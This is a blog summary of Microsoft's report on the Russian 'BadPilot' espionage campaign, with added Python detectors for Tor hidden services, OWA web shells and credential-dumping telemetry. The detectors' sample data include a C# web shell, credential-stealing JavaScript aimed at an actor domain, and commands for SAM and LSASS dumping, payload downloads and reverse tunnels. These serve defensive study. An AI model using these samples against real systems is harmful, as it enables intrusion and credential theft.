
Russian Hackers Expand Global Cyber Espionage Campaign with "BadPilot" Operation

Microsoft has revealed a multiyear cyber espionage campaign by Russian state-sponsored hackers that has compromised critical infrastructure worldwide.

A Russian state-sponsored hacking group has carried out a multiyear cyber espionage operation targeting organizations worldwide, Microsoft security researchers revealed on Tuesday.

The campaign, dubbed “BadPilot”, was conducted by a subgroup of the Russian military intelligence hacking team Seashell Blizzard (also known as Sandworm).

I’m a sucker for a great Microsoft Threat Intel report! Let’s dig into this one.

Massive Global Targeting Across Critical Sectors

Microsoft’s threat intelligence team found that since at least 2021, the BadPilot subgroup has been compromising internet-facing infrastructure across multiple industries, including:

  • Energy, oil & gas

  • Telecommunications

  • Shipping & logistics

  • Arms manufacturing

  • International governments

While some attacks appeared opportunistic, Microsoft assessed that these compromises collectively provided Russian intelligence with strategic access to support evolving geopolitical objectives.

In particular, Microsoft linked at least three destructive cyberattacks in Ukraine since 2023 to the access gained through BadPilot operations.

Technical Breakdown: How BadPilot Gains and Maintains Access

BadPilot's operations rely heavily on exploiting publicly known (n-day) vulnerabilities in internet-facing systems to gain initial access. Since early 2024, the subgroup has expanded its targeting to include U.S. and U.K. organizations, primarily by exploiting flaws in remote access and security management software.

1. Exploited Vulnerabilities for Initial Access

BadPilot exploits a range of publicly known CVEs in widely used, internet-exposed enterprise software, including:

Exploited Software            CVE(s)              Exploitation Details
Microsoft Exchange            CVE-2021-34473      ProxyShell: unauthenticated RCE chain used to drop web shells
Zimbra Collaboration Suite    CVE-2022-41352      Arbitrary file write (cpio archive handling in Amavis) used to deploy web shells
OpenFire Chat Server          CVE-2023-32315      Path traversal in the admin console bypasses authentication, giving admin access
JetBrains TeamCity CI/CD      CVE-2023-42793      Authentication bypass leading to RCE on the build server, a software supply chain pivot point
Microsoft Outlook             CVE-2023-23397      Zero-click Net-NTLMv2 hash leak via a crafted calendar reminder; hashes are cracked or relayed
ConnectWise ScreenConnect     CVE-2024-1709       Authentication bypass enabling admin takeover and code execution, used to deploy backdoors
Fortinet FortiClient EMS      CVE-2023-48788      SQL injection leading to unauthenticated RCE on the endpoint management server
JBoss                         exact CVE unknown   Used to execute arbitrary code on vulnerable systems

2. Persistence Mechanisms

Once inside a system, BadPilot rapidly deploys web shells, remote monitoring software, and backdoors to maintain access. Key persistence methods include:

2.1. Web Shells for Command Execution

  • Deployed primarily on Microsoft Exchange and Zimbra servers

  • Identified web shell variant: "LocalOlive" (an ASPX web shell written in C#)

  • Capabilities:

    • File upload/download

    • Remote shell execution

    • Port forwarding (default: TCP 250)

Web shells allow attackers to maintain persistent access, execute commands remotely, and deploy additional tooling for lateral movement.

2.2. Remote Monitoring & Management (RMM) Software for C2

In early 2024, BadPilot began using legitimate RMM tools to maintain persistence while evading traditional malware detection. The attackers installed:

  • Atera Agent (downloaded with bitsadmin or curl)

  • Splashtop Remote Services

By leveraging legitimate IT tools, the attackers blend into normal administrative traffic, making detection significantly harder.

Microsoft identified a custom persistence mechanism, ShadowLink, which configures a compromised system as a Tor hidden service.

"ShadowLink facilitates persistent remote access by configuring a compromised system to be registered as a Tor hidden service," Microsoft researchers explained. "This allows Seashell Blizzard to bypass common exploit detection methods, making it harder for network administrators to track and eliminate access."

  • How it works:

    1. Tor binaries are deployed to the compromised system

    2. A custom torrc configuration file registers the machine as a .onion service

    3. The attackers reach the host through the Tor network, so no inbound connection from an attacker-controlled IP ever crosses the perimeter

    4. Remote access is established via hidden RDP (3389) or SSH (22) services

Because the compromised host only makes outbound connections to Tor relays, there is no inbound connection to block at the firewall and no known-bad destination address for network monitoring to match; the .onion address is the only identifier, and it is reachable only through Tor.
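The torrc directives that turn a host into a Tor hidden service are public Tor configuration, so the mechanism can be shown concretely. The script below is an added example, not Microsoft's detection logic or any part of ShadowLink itself: it parses a constructed torrc (the paths, ports and client settings are invented for illustration; directive semantics follow the public tor manual) and lists every hidden-service port that maps to an interactive remote-access service on the host, which is exactly what a ShadowLink-style deployment needs in order to expose RDP or SSH.

```python
"""List Tor hidden services in a torrc and flag those that expose remote-access
ports, i.e. the ShadowLink-style configuration described above. Added example,
not the actor's file or Microsoft's detection: the torrc text, paths and ports
are constructed; directive semantics follow the public tor manual."""
from dataclasses import dataclass, field

# Constructed torrc: one hidden service forwarding RDP and SSH to the local
# host, one forwarding a web port, plus client settings the parser must ignore.
SAMPLE_TORRC = r"""
SocksPort 0
Log notice file C:\ProgramData\tor\notice.log

# remote-access service: RDP and SSH reachable through the .onion address
HiddenServiceDir C:\ProgramData\tor\svc
HiddenServicePort 3389 127.0.0.1:3389
HiddenServicePort 22 127.0.0.1:22

HiddenServiceDir C:\ProgramData\tor\web
HiddenServicePort 80 127.0.0.1:8080
"""

# Local ports that mean interactive remote access to the host itself
REMOTE_ACCESS_PORTS = {22: "ssh", 3389: "rdp", 5985: "winrm", 5986: "winrm-tls"}


@dataclass
class HiddenService:
    directory: str                                # holds the 'hostname' file with the .onion name
    ports: list = field(default_factory=list)     # (virtual_port, target) pairs


def parse_torrc(text):
    """Group each HiddenServicePort under the HiddenServiceDir that precedes it."""
    services, current = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and blank lines
        if not line:
            continue
        key, _, value = line.partition(" ")
        key = key.lower()
        if key == "hiddenservicedir":
            current = HiddenService(directory=value.strip())
            services.append(current)
        elif key == "hiddenserviceport":
            if current is None:
                raise ValueError("HiddenServicePort before any HiddenServiceDir")
            parts = value.split()
            vport = int(parts[0])
            # tor defaults the target to 127.0.0.1:VIRTPORT when it is omitted
            target = parts[1] if len(parts) > 1 else f"127.0.0.1:{vport}"
            current.ports.append((vport, target))
    return services


def exposed_remote_access(services):
    """(directory, virtual_port, protocol) for every hidden-service port whose
    target is an interactive remote-access service on this host."""
    hits = []
    for svc in services:
        for vport, target in svc.ports:
            tail = target.rsplit(":", 1)[-1]
            if not tail.isdigit():       # unix:/path targets are not TCP services
                continue
            proto = REMOTE_ACCESS_PORTS.get(int(tail))
            if proto:
                hits.append((svc.directory, vport, proto))
    return hits


if __name__ == "__main__":
    for directory, vport, proto in exposed_remote_access(parse_torrc(SAMPLE_TORRC)):
        print(f"{directory}: hidden port {vport} -> {proto}")
```

On a live host, the service's .onion address is in the `hostname` file inside the HiddenServiceDir; a tor binary running as a service or scheduled task whose torrc forwards 3389 or 22 is the artefact to hunt for, since the network itself will only show outbound TLS to Tor relays.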

3. Credential Theft & Lateral Movement

BadPilot uses multiple techniques to escalate privileges and move laterally within victim networks:

3.1. NTLM Credential Theft via Outlook Exploitation (CVE-2023-23397)

  • Sends a crafted message whose reminder sound path points at an attacker-controlled SMB server; Outlook connects to it automatically, leaking the user's Net-NTLMv2 hash with no user interaction

  • Captured hashes are cracked offline or relayed to other services that accept NTLM authentication

3.2. Credential Dumping via Registry Hives and LSASS

  • Uses reg.exe save to export the HKLM\SAM hive (local account password hashes, decryptable offline with the boot key from the SYSTEM hive)

  • Alternative method: deploys a renamed copy of Sysinternals procdump.exe to dump LSASS process memory

3.3. Credential Harvesting via Malicious Login Portals

  • BadPilot modifies OWA login pages to inject JavaScript keyloggers

  • Captured credentials are exfiltrated to actor-controlled domains

Microsoft identified actor-controlled infrastructure used for this attack:

  • hwupdates[.]com

  • cloud-sync[.]org

  • 103.201.129[.]130
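Both the web shells of section 2.1 and the tampered OWA logon page of section 3.3 live on disk under the Exchange front end, so a file-level scan catches both. The scanner below is an added example, not Microsoft's tooling: it walks a directory, flags ASPX/ASHX pages that contain the command-execution or file-transfer primitives a C# web shell needs, and parses each page's script tags to flag scripts loaded from hosts outside an allowlist or inline scripts that read the credential fields and call something able to send them elsewhere. The directory tree, the (deliberately incomplete) shell and the logon page are constructed in a temporary directory; the two outside hosts in the sample page are the actor domains listed above, and the allowlist is an assumption to tune per deployment.

```python
"""Scan an Exchange/OWA front-end tree for two tampering patterns described
above: dropped ASPX web shells and a logon page that ships credentials off-box.
Added example, not Microsoft's tooling: the file tree is constructed in a temp
directory and the script-host allowlist is an assumption to tune per site."""
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Primitives a C# web shell needs for command execution, file transfer or port
# forwarding; shipped OWA pages do not use them.
WEBSHELL_MARKERS = re.compile(
    r"Process\.Start|ProcessStartInfo|cmd\.exe|Request\.Files|\.SaveAs\(|"
    r"TcpClient\(|TcpListener\(", re.I)
ALLOWED_SCRIPT_HOSTS = {"", "owa.example.com"}  # "" = relative URL on this server


class ScriptAudit(HTMLParser):
    """Record <script src> hosts; count inline scripts that read the credential
    fields and also call something able to send them to another host."""

    def __init__(self):
        super().__init__()
        self.hosts, self.credential_hooks, self._inline = [], 0, None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src is None:
                self._inline = ""  # start buffering inline code
            else:
                self.hosts.append(urlsplit(src).hostname or "")

    def handle_data(self, data):
        if self._inline is not None:
            self._inline += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._inline is not None:
            code, self._inline = self._inline, None
            if (re.search(r"\b(username|password|passwd)\b", code, re.I)
                    and re.search(r"\b(fetch|XMLHttpRequest|sendBeacon)\b|\bImage\(", code)):
                self.credential_hooks += 1


def scan_tree(root):
    """Return (kind, relative_path, detail) for every suspicious page under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".aspx", ".ashx", ".asmx", ".html")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            hit = WEBSHELL_MARKERS.search(text)
            if hit:
                findings.append(("webshell", rel, hit.group(0)))
            audit = ScriptAudit()
            audit.feed(text)
            audit.close()
            findings += [("external_script", rel, h) for h in audit.hosts
                         if h not in ALLOWED_SCRIPT_HOSTS]
            if audit.credential_hooks:
                findings.append(("credential_hook", rel,
                                 f"{audit.credential_hooks} inline script(s)"))
    return findings


def build_sample_tree(root):
    """Constructed, simplified OWA tree: a tampered logon page and a dropped,
    deliberately incomplete web shell. Not real Exchange files."""
    sample = {
        "owa/auth/logon.aspx": """<form id="f" method="post">
<input id="username" name="username"><input id="password" name="password" type="password">
</form>
<script src="/owa/auth/15.2/scripts/logon.js"></script>
<script src="https://hwupdates.com/upd.js"></script>
<script>document.getElementById("f").addEventListener("submit", function () {
  new Image().src = "https://cloud-sync.org/c?u=" + document.getElementById("username").value
    + "&p=" + document.getElementById("password").value; });</script>""",
        "aspnet_client/system_web/olive.aspx": """<%@ Page Language="C#" %>
<script runat="server">void Page_Load(object s, EventArgs e) {
  var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request["c"]);
  Response.Write(System.Diagnostics.Process.Start(psi).StandardOutput.ReadToEnd()); }
</script>""",
    }
    for rel, body in sample.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build the constructed tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for kind, rel, detail in demo():
        print(f"{kind:16} {rel}  ({detail})")
```

The heuristics catch the two patterns the report describes, but the stronger control on a real server is an integrity comparison of the front-end tree against a clean install of the same cumulative update: any page that differs, and any ASPX file that is not part of the product, is worth a look regardless of what it contains.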

4. Data Exfiltration & Network Expansion

Once inside, BadPilot deploys tunneling utilities to exfiltrate data and expand their access across the network.

4.1. Tunneling Tools Used:

  • Chisel (TCP/UDP tunnel over HTTP, encrypted with SSH; in reverse mode it gives the attacker a SOCKS proxy into the victim network)

  • Plink (PuTTY's command-line SSH client, used for SSH port forwarding)

  • rsockstun (reverse SOCKS5 tunnel over TLS)

Attackers rename the tools so they look like legitimate Microsoft binaries, using names such as:

  • MsChSoft.exe

  • MsNan.exe

  • Sys.exe

  • MicrosoftExchange32.exe
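The techniques in sections 3.2 and 4.1 all leave signals in process-creation telemetry: reg.exe saving registry hives, a full memory dump of LSASS, built-in download tools fetching an RMM installer, and tools whose on-disk name (MsChSoft.exe, Sys.exe) does not match the name embedded in their version information. The detector below is an added example, not Microsoft's hunting logic; it works on Sysmon Event ID 1-style fields (Image, OriginalFileName, CommandLine) and runs over constructed sample events in which only the renamed file names come from the report; every path, host and argument is invented.

```python
"""Hunt for BadPilot-style credential dumping, RMM staging and renamed
tunnelling tools in process-creation telemetry (Sysmon Event ID 1 fields).
Added example; the sample events are constructed, not from the report."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    image: str
    command_line: str


# reg.exe save of the SAM/SYSTEM/SECURITY hives (offline hash recovery)
HIVE_DUMP = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b", re.I)
# procdump-style full memory dump of LSASS, whatever the binary is called
LSASS_DUMP = re.compile(r"\s-ma\s+lsass\b", re.I)
# RMM agents pulled down with built-in download tools
RMM_FETCH = re.compile(
    r"\b(?:bitsadmin(?:\.exe)?\s+/transfer|curl(?:\.exe)?)\b.*\b(?:atera|splashtop)", re.I)
# chisel reverse client (R:), plink remote forward (-R), rsockstun; case-sensitive on purpose
REVERSE_TUNNEL = re.compile(r"\bclient\b.*\bR:|\s-R\s+\d+:|\brsockstun\b")


def _stem(path):
    """Lower-cased file name without directory or extension."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[0].lower()


def is_renamed(event):
    """True when the PE's embedded OriginalFileName disagrees with the on-disk name."""
    original = event.get("OriginalFileName", "")
    if not original or original == "-":  # no version info: cannot tell
        return False
    return _stem(original) != _stem(event["Image"])


def analyze(events):
    """Return one Finding per (event, rule) match."""
    findings = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        if is_renamed(ev):
            findings.append(Finding("renamed_tool", ev["Image"], cmd))
        for rule, pattern in (("hive_dump", HIVE_DUMP), ("lsass_dump", LSASS_DUMP),
                              ("rmm_fetch", RMM_FETCH), ("reverse_tunnel", REVERSE_TUNNEL)):
            if pattern.search(cmd):
                findings.append(Finding(rule, ev["Image"], cmd))
    return findings


# Constructed sample telemetry: file names from the report, everything else invented
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r"reg save hklm\sam C:\Windows\Temp\sam.hiv"},
    {"Image": r"C:\ProgramData\MsNan.exe", "OriginalFileName": "procdump",
     "CommandLine": r"MsNan.exe -accepteula -ma lsass.exe C:\ProgramData\l.dmp"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority high "
                    r"http://203.0.113.5/AteraAgent.msi C:\Windows\Temp\a.msi"},
    {"Image": r"C:\Windows\Temp\MsChSoft.exe", "OriginalFileName": "-",  # Go build, no version info
     "CommandLine": "MsChSoft.exe client --reverse https://203.0.113.5:443 R:1080:socks"},
    {"Image": r"C:\Windows\Temp\Sys.exe",  # version info absent in this constructed record
     "CommandLine": "Sys.exe -N -R 2222:127.0.0.1:22 tunnel@203.0.113.5 -pw x"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",  # benign
     "CommandLine": r"reg query hklm\software\microsoft\windows\currentversion\run"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.rule:15} {f.image}")
```

The OriginalFileName comparison only works when the binary carries version information; stripped or Go-built tools such as chisel usually do not, which is why the command-line patterns carry the tunnelling cases and why a file that is both unsigned and versionless in a writable directory like C:\ProgramData deserves attention on its own.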

Microsoft linked several VPS servers to BadPilot's tunneling and exfiltration activity:

Tunneling Server     Observed Active Period
103.201.129[.]130    May 2022 - July 2022
104.160.6[.]2        September 2022 - December 2022
195.26.87[.]209      September 2023 - April 2024

Geographical Scope Expands Beyond Ukraine

While BadPilot initially focused on Ukraine in 2022, its operations expanded globally in 2023. The hackers have since infiltrated organizations in the United States, Europe, Central Asia, and the Middle East.

In early 2024, the campaign sharpened its focus on targets in the United States, United Kingdom, Canada, and Australia, likely in response to shifting Russian intelligence priorities.

How Organizations Can Defend Themselves

Microsoft recommends organizations take the following steps to mitigate risk:

  • Apply security patches immediately for internet-facing systems.

  • Enable multi-factor authentication to protect against credential theft.

  • Monitor for indicators of compromise (IoCs) using threat intelligence from Microsoft.

  • Harden access controls to detect and block unauthorized remote connections.

To wrap, direct from the Microsoft report: “This subgroup, which is characterized within the broader Seashell Blizzard organization by its near-global reach, represents an expansion in both the geographical targeting conducted by Seashell Blizzard and the scope of its operations. At the same time, Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive opportunities for niche operations and activities that will continue to be valuable over the medium term.”